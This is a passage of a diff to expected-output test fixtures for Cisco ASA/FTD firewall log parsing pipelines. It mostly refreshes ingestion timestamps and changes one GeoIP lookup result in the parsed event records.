10.1.5.60/53 due to DNS Query", "code": "106007", "kind": "event", @@ -2083,7 +2083,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535087900Z", + "ingested": "2021-12-14T14:36:57.032447603Z", "original": "Apr 30 2013 09:23:06: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2153,7 +2153,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535093200Z", + "ingested": "2021-12-14T14:36:57.032447954Z", "original": "Apr 30 2013 09:23:08: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2223,7 +2223,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535099Z", + "ingested": "2021-12-14T14:36:57.032449780Z", "original": "Apr 30 2013 09:23:15: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2293,7 +2293,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535104800Z", + "ingested": "2021-12-14T14:36:57.032450212Z", "original": "Apr 30 2013 09:23:24: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2363,7 +2363,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535110600Z", + "ingested": "2021-12-14T14:36:57.032450553Z", "original": "Apr 30 2013 09:23:34: %ASA-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2433,7 +2433,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535116400Z", + "ingested": "2021-12-14T14:36:57.032450977Z", "original": "Apr 30 2013 09:23:40: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2503,7 +2503,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535122100Z", + "ingested": "2021-12-14T14:36:57.032451307Z", "original": "Apr 30 2013 09:23:41: %ASA-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2573,7 +2573,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535127900Z", + "ingested": "2021-12-14T14:36:57.032451640Z", "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2643,7 +2643,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535133600Z", + "ingested": "2021-12-14T14:36:57.032451973Z", "original": "Apr 30 2013 09:23:43: %ASA-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2713,7 +2713,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535139200Z", + "ingested": "2021-12-14T14:36:57.032452301Z", "original": "Apr 15 2018 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2788,7 +2788,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535144900Z", + "ingested": "2021-12-14T14:36:57.032452631Z", "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80)", "code": "302015", "kind": "event", @@ -2863,7 +2863,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535150500Z", + "ingested": "2021-12-14T14:36:57.032452964Z", "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", @@ -2936,7 +2936,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535156800Z", + "ingested": "2021-12-14T14:36:57.032453299Z", "original": "Dec 11 2018 08:01:24 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group \"dmz\" [0x123a465e, 0x4c7bf613]", "code": "106023", "kind": "event", @@ -3012,7 +3012,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535162600Z", + "ingested": "2021-12-14T14:36:57.032453635Z", "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", @@ -3090,7 +3090,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535168700Z", + "ingested": "2021-12-14T14:36:57.032453965Z", "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678)", "code": "302013", "kind": "event", @@ -3168,7 +3168,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:11.535173800Z", + "ingested": "2021-12-14T14:36:57.032454310Z", "original": "Dec 11 2018 08:01:31 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", "code": "302014", "kind": "event", @@ -3245,7 +3245,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:11.535178600Z", + "ingested": "2021-12-14T14:36:57.032454641Z", "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", @@ -3322,7 +3322,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:11.535184800Z", + "ingested": "2021-12-14T14:36:57.032454969Z", "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", @@ -3391,7 +3391,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535189900Z", + "ingested": "2021-12-14T14:36:57.032455305Z", "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", @@ -3457,7 +3457,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535193800Z", + "ingested": "2021-12-14T14:36:57.032455633Z", "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", @@ -3528,7 +3528,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535198400Z", + "ingested": "2021-12-14T14:36:57.032455963Z", "original": "Dec 11 2018 08:01:39 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", "code": "106023", "kind": "event", @@ -3602,7 +3602,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535204300Z", + "ingested": "2021-12-14T14:36:57.032456380Z", "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", @@ -3678,7 +3678,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535208900Z", + "ingested": "2021-12-14T14:36:57.032456719Z", "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", @@ -3756,7 +3756,7 @@ "severity": 6, "duration": 86399000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:11.535213500Z", + "ingested": "2021-12-14T14:36:57.032457049Z", "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", "code": "302014", "kind": "event", @@ -3829,7 +3829,7 @@ "event": { "severity": 6, "duration": 122000000000, - "ingested": "2021-12-09T13:32:11.535217400Z", + "ingested": "2021-12-14T14:36:57.032457379Z", "original": "Aug 15 2012 23:30:09 : %ASA-6-302016 Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416", "code": "302016", "kind": "event", @@ -3896,7 +3896,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535222200Z", + "ingested": "2021-12-14T14:36:57.032457784Z", "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -3960,7 +3960,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535226500Z", + "ingested": "2021-12-14T14:36:57.032458110Z", "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4024,7 +4024,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535231100Z", + "ingested": "2021-12-14T14:36:57.032458446Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4088,7 +4088,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535236Z", + "ingested": "2021-12-14T14:36:57.032458780Z", "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4152,7 +4152,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535258400Z", + "ingested": "2021-12-14T14:36:57.032459115Z", "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4216,7 +4216,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535263300Z", + "ingested": "2021-12-14T14:36:57.032459463Z", "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4280,7 +4280,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535269400Z", + "ingested": "2021-12-14T14:36:57.032459799Z", "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4344,7 +4344,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535273900Z", + "ingested": "2021-12-14T14:36:57.032460127Z", "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4419,7 +4419,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535278800Z", + "ingested": "2021-12-14T14:36:57.032460468Z", "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", "code": "106023", "kind": "event", @@ -4484,7 +4484,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:32:11.535300500Z", + "ingested": "2021-12-14T14:36:57.032460801Z", "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %ASA-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside", "code": "313001", "kind": "event", @@ -4547,7 +4547,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535306100Z", + "ingested": "2021-12-14T14:36:57.032461136Z", "original": "Jan 14 2015 13:16:13: %ASA-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session", "code": "313004", "kind": "event", @@ -4628,7 +4628,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535311500Z", + "ingested": "2021-12-14T14:36:57.032461467Z", "original": "Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com", "code": "338002", "kind": "event", @@ -4706,7 +4706,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535315800Z", + "ingested": "2021-12-14T14:36:57.032461793Z", "original": "Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338004", "kind": "event", @@ -4785,7 +4785,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.535320300Z", + "ingested": "2021-12-14T14:36:57.032462124Z", "original": "Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338008", "kind": "event", @@ -4849,7 +4849,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535325700Z", + "ingested": "2021-12-14T14:36:57.032462461Z", "original": "Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app", "code": "304001", "kind": "event", @@ -4905,7 +4905,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535330500Z", + "ingested": "2021-12-14T14:36:57.032462815Z", "original": "Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com", "code": "304001", "kind": "event", @@ -4967,7 +4967,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535334400Z", + "ingested": "2021-12-14T14:36:57.032463152Z", "original": "Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside", "code": "304002", "kind": "event", @@ -4994,20 +4994,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5063,7 +5057,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535339100Z", + "ingested": "2021-12-14T14:36:57.032463486Z", "original": "Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (81.2.69.144/49926)(LOCAL\\username) to vlan-42:81.2.69.144/80 (81.2.69.144/80) (username)", "code": "302013", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa-fix.log-expected.json index d8a0285afc9..2c8960a2313 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -57,7 +57,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:19.965226800Z", + "ingested": "2021-12-14T14:37:04.974743379Z", "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)", "code": "302016", "kind": "event", @@ -134,7 +134,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:19.965230800Z", + "ingested": "2021-12-14T14:37:04.974745470Z", "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -203,7 +203,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:19.965235200Z", + "ingested": "2021-12-14T14:37:04.974745944Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]", "code": "106023", "kind": "event", @@ -279,7 +279,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:19.965239100Z", + "ingested": "2021-12-14T14:37:04.974746366Z", "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -340,7 +340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:19.965242900Z", + "ingested": "2021-12-14T14:37:04.974746770Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123", "code": "106017", "kind": "event", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log-expected.json index f3f42c70e51..0cf9c379306 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log-expected.json @@ -59,7 +59,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603706900Z", + "ingested": "2021-12-14T14:37:05.575470184Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "code": "305011", "kind": "event", @@ -138,7 +138,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603715500Z", + "ingested": "2021-12-14T14:37:05.575472447Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", "code": "302013", "kind": "event", @@ -224,7 +224,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603721500Z", + "ingested": "2021-12-14T14:37:05.575472839Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", "code": "302014", "kind": "event", @@ -309,7 +309,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603727400Z", + "ingested": "2021-12-14T14:37:05.575473181Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", "code": "302014", "kind": "event", @@ -394,7 +394,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603733100Z", + "ingested": "2021-12-14T14:37:05.575473538Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", "code": "302014", "kind": "event", @@ -479,7 +479,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603738900Z", + "ingested": "2021-12-14T14:37:05.575473870Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", "code": "302014", "kind": "event", @@ -564,7 +564,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603744600Z", + "ingested": "2021-12-14T14:37:05.575474204Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", "code": "302014", "kind": "event", @@ -649,7 +649,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603750400Z", + "ingested": "2021-12-14T14:37:05.575474541Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", "code": "302014", "kind": "event", @@ -734,7 +734,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603756200Z", + "ingested": "2021-12-14T14:37:05.575474876Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", "code": "302014", "kind": "event", @@ -819,7 +819,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603762100Z", + "ingested": "2021-12-14T14:37:05.575475220Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", "code": "302014", "kind": "event", @@ -904,7 +904,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603767900Z", + "ingested": "2021-12-14T14:37:05.575475550Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", "code": "302014", "kind": "event", @@ -989,7 +989,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603774Z", + "ingested": "2021-12-14T14:37:05.575476070Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", "code": "302014", "kind": "event", @@ -1074,7 +1074,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603779900Z", + "ingested": "2021-12-14T14:37:05.575476529Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", "code": "302014", "kind": "event", @@ -1159,7 +1159,7 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603824200Z", + "ingested": "2021-12-14T14:37:05.575476868Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", "code": "302014", "kind": "event", @@ -1244,7 +1244,7 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603829500Z", + "ingested": "2021-12-14T14:37:05.575477202Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", "code": "302014", "kind": "event", @@ -1329,7 +1329,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603835800Z", + "ingested": "2021-12-14T14:37:05.575477534Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", "code": "302014", "kind": "event", @@ -1414,7 +1414,7 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603839700Z", + "ingested": "2021-12-14T14:37:05.575477996Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", "code": "302014", "kind": "event", @@ -1499,7 +1499,7 @@ "severity": 6, "duration": 71000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:32:20.603843800Z", + "ingested": "2021-12-14T14:37:05.575478333Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", "code": "302014", "kind": "event", @@ -1584,7 +1584,7 @@ "severity": 6, "duration": 30000000000, "reason": "SYN Timeout", - "ingested": "2021-12-09T13:32:20.603847300Z", + "ingested": "2021-12-14T14:37:05.575478694Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", "code": "302014", "kind": "event", @@ -1666,7 +1666,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603851800Z", + "ingested": "2021-12-14T14:37:05.575479032Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188", "code": "305011", "kind": "event", @@ -1745,7 +1745,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603857600Z", + "ingested": "2021-12-14T14:37:05.575479368Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -1830,7 +1830,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.603862600Z", + "ingested": "2021-12-14T14:37:05.575479696Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148", "code": "302016", "kind": "event", @@ -1913,7 +1913,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.603868400Z", + "ingested": "2021-12-14T14:37:05.575480029Z", "original": "Oct 10 2018 12:34:56 localhost 